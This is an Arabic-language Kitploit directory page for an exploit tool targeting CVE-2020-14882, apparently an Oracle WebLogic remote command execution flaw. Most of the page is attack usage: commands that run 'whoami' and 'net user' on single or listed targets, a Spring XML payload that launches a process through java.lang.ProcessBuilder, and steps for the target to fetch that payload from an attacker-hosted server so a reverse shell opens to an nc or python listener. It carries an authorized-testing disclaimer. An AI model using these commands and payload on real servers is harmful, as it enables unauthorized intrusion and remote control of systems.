Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-14882_ALL — CVE-2020-14882_ALL أداة استغلال شاملة، تدعم اكتشاف عرض الأوامر، عرض الأوامر الجماعي، تنفيذ الأوامر بدون عرض عبر XML خارجي، ووظائف أخرى. | Kitploit
أدوات/GitHubGitHub/ggyao/cve-2020-14882_all
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubggyao/cve-2020-14882_all

CVE-2020-14882_ALL

CVE-2020-14882_ALL أداة استغلال شاملة، تدعم اكتشاف عرض الأوامر، عرض الأوامر الجماعي، تنفيذ الأوامر بدون عرض عبر XML خارجي، ووظائف أخرى.

عرض المستودع
144386منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2020-14882_ALL

أداة شاملة لاستغلال CVE-2020-14882_ALL، تدعم كشف إظهار الأوامر وإظهار الأوامر بشكل جماعي وتنفيذ الأوامر بدون إظهار باستخدام ملف XML خارجي.

الوحدات المطلوبة: requests, http.client

** (الأداة مخصصة فقط لاختبار الأمان المصرح به، يرجى عدم استخدامها بشكل غير قانوني. المخالفات لا علاقة لها بالمؤلف.) **

الإصدارات المعروفة الناجحة لوحدة إظهار الأوامر: 12.2.1.3.0، 12.2.1.4.0، 14.1.1.0.0

الخيارات

الوظيفة الأولى: إظهار الأوامر

python3 CVE-2020-14882_ALL.py -u http://1.1.1.1:7001 -c "net user"

python3 CVE-2020-14882_ALL.py -u http://1.1.1.1:7001 -c "whoami"

الوظيفة الثانية: إظهار الأوامر بشكل جماعي

python3 CVE-2020-14882_ALL.py -f target.txt -c "whoami"

تنسيق target.txt: http://x.x.x.x:xx، سطر واحد لكل عنوان.

الوظيفة الثالثة: تنفيذ الأوامر بدون إظهار باستخدام ملف XML خارجي

1- على سبيل المثال، لإنشاء شل عكسية على لينكس، قم بتحرير ملف poc.xml وابدأ الاستماع عبر بايثون.

root@kitploit:~
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
	<value>cmd</value>
      </list>
    </constructor-arg>
  </bean>
</beans>

قم ببدء الاستماع عبر بايثون.

قم ببدء الاستماع عبر nc.

2- استخدم الخيار -x لتحديد مسار ملف XML وإرسال البايلود.

python3 CVE-2020-14882_ALL.py -u http://xxxx:7001 -x http://xxx:8000/poc.xml

3- استقبال الشل بنجاح.

تنزيل الأداة